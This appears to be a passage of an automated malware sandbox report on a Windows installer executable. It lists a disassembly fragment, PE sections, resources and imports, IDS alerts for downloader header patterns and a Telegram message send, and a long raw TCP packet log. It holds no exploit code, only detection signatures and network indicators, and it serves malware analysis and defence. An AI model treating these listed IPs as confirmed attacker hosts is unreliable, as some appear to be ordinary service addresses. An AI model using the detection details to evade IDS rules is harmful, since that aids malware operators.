push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00421708h
call dword ptr [0040818Ch]
push 0040A384h
push 00429260h
call 00007F204CE7AD32h
call dword ptr [004080ACh]
mov ebx, 00435000h
push eax
push ebx
call 00007F204CE7AD20h
push ebp
call dword ptr [00408178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84bc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4f000	0x1c5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc0388	0x798
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x615e	0x6200	41c79e199a2175acbe73d4712982d296	False	0.6625876913265306	data	6.4557374109402	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1370	0x1400	9cbedf8ff452ddf88e3b9cf6f80372a9	False	0.4404296875	data	5.102148788391081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	73e3da5d6c2dd1bec8a02d238a90e209	False	0.5149739583333334	data	4.09485328769633	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x24000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4f000	0x1c5c8	0x1c600	0e60bf3ace34d6a7de54772dad04b786	False	0.8734684746696035	data	7.577852317524115	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4f418	0xc9c0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9973280669144982
RT_ICON	0x5bdd8	0x5d9c	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.9926556501418795
RT_ICON	0x61b78	0x2e8e	PNG image data, 256 x 256, 4-bit colormap, non-interlaced	English	United States	0.9979023326061419
RT_ICON	0x64a08	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4182572614107884
RT_ICON	0x66fb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.45075046904315197
RT_ICON	0x68058	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States	0.6625799573560768
RT_ICON	0x68f00	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States	0.7382671480144405
RT_ICON	0x697a8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.6317073170731707
RT_ICON	0x69e10	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States	0.5505780346820809
RT_ICON	0x6a378	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6187943262411347
RT_ICON	0x6a7e0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.7002688172043011
RT_ICON	0x6aac8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.8074324324324325
RT_DIALOG	0x6abf0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6acf0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6ae10	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6aed8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6af38	0xae	data	English	United States	0.6379310344827587
RT_VERSION	0x6afe8	0x29c	data	English	United States	0.5089820359281437
RT_MANIFEST	0x6b288	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GetDiskFreeSpaceW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T17:09:09.446890+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.11	49981	142.250.186.78	443	TCP
2025-01-10T17:09:14.955499+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49983	158.101.44.242	80	TCP
2025-01-10T17:09:16.346143+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49983	158.101.44.242	80	TCP
2025-01-10T17:09:16.958454+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49985	104.21.80.1	443	TCP
2025-01-10T17:09:17.539679+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49986	158.101.44.242	80	TCP
2025-01-10T17:09:27.623481+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49997	104.21.80.1	443	TCP
2025-01-10T17:09:28.856245+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49999	104.21.80.1	443	TCP
2025-01-10T17:09:29.775129+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.11	50000	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 17:09:08.394404888 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:08.394449949 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:08.394539118 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:08.410125017 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:08.410140991 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.068032980 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.068135023 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:09.068795919 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.068898916 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:09.123471975 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:09.123497963 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.123845100 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.123927116 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:09.127335072 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:09.175338030 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.446877003 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.446985960 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:09.447010994 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.447083950 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:09.447580099 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.447626114 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.447640896 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:09.447748899 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:09.463661909 CET	49981	443	192.168.2.11	142.250.186.78
Jan 10, 2025 17:09:09.463689089 CET	443	49981	142.250.186.78	192.168.2.11
Jan 10, 2025 17:09:09.558640003 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:09.558676004 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:09.558764935 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:09.559076071 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:09.559087992 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:10.218740940 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:10.218977928 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:10.223078966 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:10.223092079 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:10.223675013 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:10.227030039 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:10.228339911 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:10.271375895 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.570099115 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.570199013 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.578867912 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.582370996 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.589162111 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.589308023 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.589329958 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.589462042 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.597079992 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.597203016 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.661485910 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.661545038 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.661573887 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.661607981 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.661612988 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.661621094 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.661647081 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.661670923 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.661983967 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.662025928 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.665837049 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.665882111 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.665889978 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.665935993 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.672050953 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.672099113 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.672108889 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.672148943 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.678436995 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.678483963 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.678493023 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.678531885 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.684815884 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.684860945 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.684871912 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.684911013 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.691159964 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.691221952 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.691231966 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.691281080 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.697629929 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.700664043 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.700675964 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.700732946 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.703979969 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.704025984 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.704034090 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.704072952 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.710315943 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.710361958 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.710371017 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.710412025 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.716836929 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.716895103 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.716907024 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.716947079 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.723160982 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.723222971 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.731399059 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.731452942 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.731466055 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.731506109 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.754343033 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.754410028 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.754445076 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.754496098 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.754503012 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.754543066 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.754545927 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.754559994 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.754589081 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.754615068 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.754616022 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.754623890 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.754652023 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.754678965 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.756092072 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.756133080 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.756141901 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.756190062 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.756195068 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.756232023 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.760386944 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.760436058 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.760442972 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.760482073 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.766259909 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.766308069 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.766313076 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.766354084 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.769793034 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.769834042 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.769839048 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.769881964 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.774585009 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.774627924 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.774635077 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.774682999 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.779356003 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.779402018 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.779409885 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.779448986 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.784142971 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.784190893 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.784198046 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.784235001 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.788952112 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.789005995 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.789020061 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.789061069 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.793840885 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.793900013 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.793906927 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.793947935 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.798641920 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.798685074 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.798691034 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.798729897 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.803359032 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.803414106 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.803422928 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.803508043 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.808150053 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.808201075 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.808206081 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.808242083 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.812897921 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.812947035 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.812948942 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.812962055 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.812994003 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.813014984 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.817419052 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.817483902 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.817492962 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.817533016 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.825283051 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.825334072 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.825341940 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.825385094 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.826505899 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.826550961 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.826556921 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.826833963 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.830456018 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.830522060 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.830529928 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.830571890 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.834866047 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.834922075 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.834928989 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.834969997 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.839036942 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.839086056 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.839093924 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.839135885 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.844949007 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.844986916 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.844995022 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.845032930 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.845038891 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.845074892 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.845174074 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.845205069 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.846102953 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.846144915 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.846188068 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.846231937 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.848500013 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.848548889 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.848555088 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.848593950 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.850524902 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.850629091 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.850641012 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.850676060 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.852823973 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.852868080 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.852874994 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.852920055 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.855143070 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.855191946 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.855199099 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.855252981 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.857292891 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.857342005 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.857412100 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.857445955 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.859688044 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.859729052 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.859738111 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.859776020 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.861957073 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.861994028 CET	49982	443	192.168.2.11	142.250.186.33
